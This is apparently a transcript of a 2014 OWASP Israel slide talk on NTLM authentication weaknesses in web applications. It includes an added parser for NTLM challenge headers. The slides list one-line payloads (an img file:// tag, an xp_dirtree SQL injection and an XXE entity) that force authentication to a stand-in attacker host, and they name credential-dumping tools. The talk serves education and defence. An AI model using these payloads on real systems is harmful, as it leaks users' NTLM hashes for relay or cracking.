NTLM Based Authentication in Web Applications:

by Hacktics Advanced Security Center on 15 January 2014


Transcript of NTLM Based Authentication in Web Applications:

NTLM Based Authentication in Web Applications: The Good, The Bad, and the NHASTIE
Oren Ofer, Hacktics ASC
About Me
Information Security Department Leader, EY
Application Security Assessments
Mobile Security Assessments
Network / Infra Security Assessments
Spear Phishing Simulations
Researcher
Trainer


14 January 2014, OWASP Israel
Demo Time
NTLM IS A…
NT LAN Manager Authentication Protocol
Replaced LAN Manager Authentication
Supports Connection Oriented Protocols
Supports Connectionless Protocols
NTLM IS A…
Official Versions: v1, v2
Challenge Response Authentication

CIFS / SMB
FTP / SFTP
HTTP / HTTPS
IMAP
L2TP
LDAP
MS SQL
MS-RPC / MS-RPC/HTTP
POP3
PPTP-MPPE
RADIUS (WiFi)
RDP
SIP / SIP/TLS
SMTP
Telnet
Simplified NTLM HTTP in TCP Socket (C = client, S = server):

C -> S: GET / HTTP/1.1
S -> C: HTTP/1.1 401 Access Denied
        WWW-Authenticate: Negotiate or WWW-Authenticate: NTLM
C -> S: GET / HTTP/1.1
        Authorization: NTLM base64(NTLMSSP + padding)
S -> C: HTTP/1.1 401 Access Denied
        WWW-Authenticate: NTLM base64(NTLMSSP, Challenge, Domain, Host)
C -> S: GET / HTTP/1.1
        Authorization: NTLM base64(NTLMSSP + Domain User, Host, Challenge Response)
S -> C: HTTP/1.1 200 OK
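Added example, not code from the talk or the NHASTIE project: a Python parser that takes a raw 401 response like the second server message above, decodes the NTLMSSP CHALLENGE_MESSAGE carried in WWW-Authenticate, and reports the target name, the 8-byte server challenge and whether signing or extended session security is flagged, which is enough to inventory which of your own web servers answer with NTLM (the Shodan counts later in the talk do this at Internet scale). The flag values follow the MS-NLMP layout; the sample response and its "CORP" target name are constructed here.

```python
import base64
import struct

NTLMSSP_NEGOTIATE_UNICODE = 0x00000001
NTLMSSP_NEGOTIATE_SIGN = 0x00000010
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000

def parse_challenge(blob: bytes) -> dict:
    """Decode an NTLMSSP CHALLENGE_MESSAGE (type 2) from a WWW-Authenticate header."""
    if blob[:8] != b"NTLMSSP\x00":
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", blob, 8)[0]
    if msg_type != 2:
        raise ValueError("expected CHALLENGE_MESSAGE, got type %d" % msg_type)
    name_len, _, name_off = struct.unpack_from("<HHI", blob, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", blob, 20)[0]                  # NegotiateFlags
    codec = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"
    return {
        "target": blob[name_off:name_off + name_len].decode(codec),
        "challenge": blob[24:32].hex(),          # 8-byte ServerChallenge
        "signing": bool(flags & (NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN)),
        "ess": bool(flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY),
    }

def ntlm_challenge_from_response(raw: str):
    """Return the parsed challenge if the response carries an NTLM type 2 token, else None."""
    for line in raw.split("\r\n"):
        name, _, value = line.partition(":")
        if name.strip().lower() != "www-authenticate":
            continue
        scheme, _, token = value.strip().partition(" ")
        if scheme.upper() == "NTLM" and token:       # bare "NTLM" (first 401) has no token
            return parse_challenge(base64.b64decode(token))
    return None

def sample_challenge(target: str, flags: int, challenge: bytes) -> bytes:
    """Constructed sample type 2 message: 56-byte fixed header, then the target name."""
    name = target.encode("utf-16-le")
    msg = b"NTLMSSP\x00" + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(name), len(name), 56)   # TargetNameFields
    msg += struct.pack("<I", flags) + challenge + bytes(8)  # flags, challenge, reserved
    msg += struct.pack("<HHI", 0, 0, 56 + len(name))        # empty TargetInfoFields
    msg += bytes(8)                                          # Version
    return msg + name

# Constructed 401 response shaped like the second server message in the exchange
SAMPLE_TYPE2 = sample_challenge("CORP", NTLMSSP_NEGOTIATE_UNICODE, bytes(range(1, 9)))
SAMPLE_RESPONSE = "HTTP/1.1 401 Access Denied\r\nWWW-Authenticate: NTLM " + base64.b64encode(SAMPLE_TYPE2).decode() + "\r\n\r\n"
```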
NTLM IS Also…
Reported with design flaws since 1996.
*https://www.usenix.org/legacy/events/sec10/tech/slides/geer.pdf

Many design flaws.
Many many many design flaws.
Many many many many Design Flaws.
Let's list a few, well at least until 2010

Why Is NTLM Still Alive?!
"Single Sign On"
"Backwards compatibility"
"Easy to deploy"
"Cost efficient"
"Is strong if deployed correctly"
"Inside the internal infra it is okay..."
"No easy alternatives"


Ntlm Http Session TIer Exploit
NTLM Attack Vectors
NTLM Extraction from Sam & Memory*
Force Auto Submission
Offline Cracking
Replay/Relay Attacks
TCP Session Hijacking*
Application Perspective
NTLM Extraction from Sam & Memory*
XSS / CSRF
<img src="file://attacker">
SQL Injection
user="test';EXEC master.sys.xp_dirtree '\\attacker.com
Word Document Template
XML External Entity (XXE)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///attacker.com" >]><foo>&xxe;</foo>
Office Preview
Phishing
Desktop.ini
.lnk file
Force Auto Submission
Requires Admin User
Pass the Hash
Publicly available tools
Offline Cracking
Cryptographic Flaws
Rainbow Tables
Cloud Super Computer
Downgrade Attacks
What is your GPO configuration?
Replay & Relay
WCE
Mimikatz
Pwdump
...
1. Client requests: "let's use NTLM version STRONG"
2. Server Responds : "Let's use NTLM version WEAK"
3. Client says: "Okay"

Replay - Resend a valid authentication
Relay - Authenticate through the attacker
Relay
NTLM in Web Applications
Based on Shodanhq.com:
172,000 websites respond with NTLM
68,657 NTLM MicrosoftSharePointTeamServices
Meaning 40%!
NTLM Cross Protocol Relay Example
HTTP NTLM in OWASP Top 10
How to Defend Web Applications?
Form Based Authentication!
Thank you!
Application Perspective
No Autocomplete=off
Users can be auto-connected = Persistent Cookie
NHASTIE
[NHASTIE demo diagram: Victim, TCP Socket, NTLM HTTP, SMB 2 HTTP, Open Malicious Word file, SQL Injection]
Oren Ofer, Hacktics ASC
@oren1ofer
oren.ofer@il.ey.com

A2-Broken Authentication and Session Management
A5-Security Misconfiguration
A6-Sensitive Data Exposure
A8-Cross-Site Request Forgery
A9-Using Components with Known Vulnerabilities
NHASTIE Projects:
https://github.com/hacktics/nhastie